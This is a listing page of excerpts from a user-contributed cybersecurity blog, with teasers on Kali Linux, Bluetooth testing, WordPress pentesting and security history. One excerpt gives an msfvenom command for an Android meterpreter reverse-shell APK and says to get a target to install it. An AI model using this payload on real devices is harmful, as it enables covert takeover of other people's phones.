0P3N Blog
Cybrary’s Open Blog is a user contributed cybersecurity knowledge base that brings together content highlighting the latest tools, exploits, technologies and insights in the industry.


How Digital Crimes Fit with the Current Legal System Crimes have been evolving throughout our history, as there are new secure ways created to protect the society, the criminals are getting smarter in breaking these new ways. Society till the late 19 th century consisted of all physical items such as paper files, ...


Today I’ll show you how to be more efficient and faster when you want to code. My secret is Atom, an open source text editor, used by the majority of elite coders under the same vim, sublime text etc. Atom has the particularity to contain thousands of packages that will make your job easier. You can download it at, ...


Bluetooth is a very useful and attracting technology and The Ubertooth One is an open source and widely available Bluetooth testing and research tool. Every Bluetooth device has a 48-bit unique Bluetooth device address, as it's mac address, which consists of 3 sections. Non-significant address part (NSP), upper address part (UAP) and lower address part (LAP). In order to connect to a ...


In this chapter, we are going to install updates and upgrade our kali Linux install. We will also install Gedit. We will also learn some basic commands for installing, updating and upgrading packages in Linux. What is Gedit? Gedit is a graphical user interface text editor. We are going to use this editor in our course. GEDIT is simple ...


This tutorial assumes you have the latest version of Juliar downloaded on your computer. If not, please see previous tutorials. Hello Cybrarians and RatTeamsters,In today's tutorial, we will be learning how to quickly grab contents of the file and output it onto the screen.Here are the commands we will be using: __getByteFromString ...


What is Kali Linux? Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing . Kali contains several hundred tools which are geared towards various information security tasks, such as Penetration Testing, Security research, etc Should I ...


There are many past events and people who have attributed to the field of Information Security, and as Cybrary begins to explore some of the key players and happenings that got the industry to where it is today, we felt it important to remember one significant contributor, Rebecca ‘Becky’ Bace.Becky Bace has had a significant impact of the security ...


Android smartphones (Hack)/(Takeover) 19Create a payload by typing the information below. Number 1, should be saved in your home folder.1. msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.25 LPORT=8888 R> Manjohn.apk The manjohn.apk file you send to your target, get them to install it.This will create the payload called program.apk (or whatever you name it), where you see the IP and port you need ...


Hacking began in the 1960s at MIT when students attempted to learn more about mainframe computing systems and improve their skills.The telephone systems were tempting to phreakers, and John Draper, known as Captain Crunch, used a whistle packaged in Captain Crunch cereal to generate a 2600 Hertz tone that allowed access to AT&T long distance network. This discovery led ...


WordPress is a free online Open source content Managed system focused on PHP and MySQL. It is one the powerful and most used blogging tool.As there is too many up’s and down’s in WordPress usage, it requires a security improvement, so the penetration test is essential to find the vulnerabilities and to secure you WordPress powered blog.Security researcher Daniel ...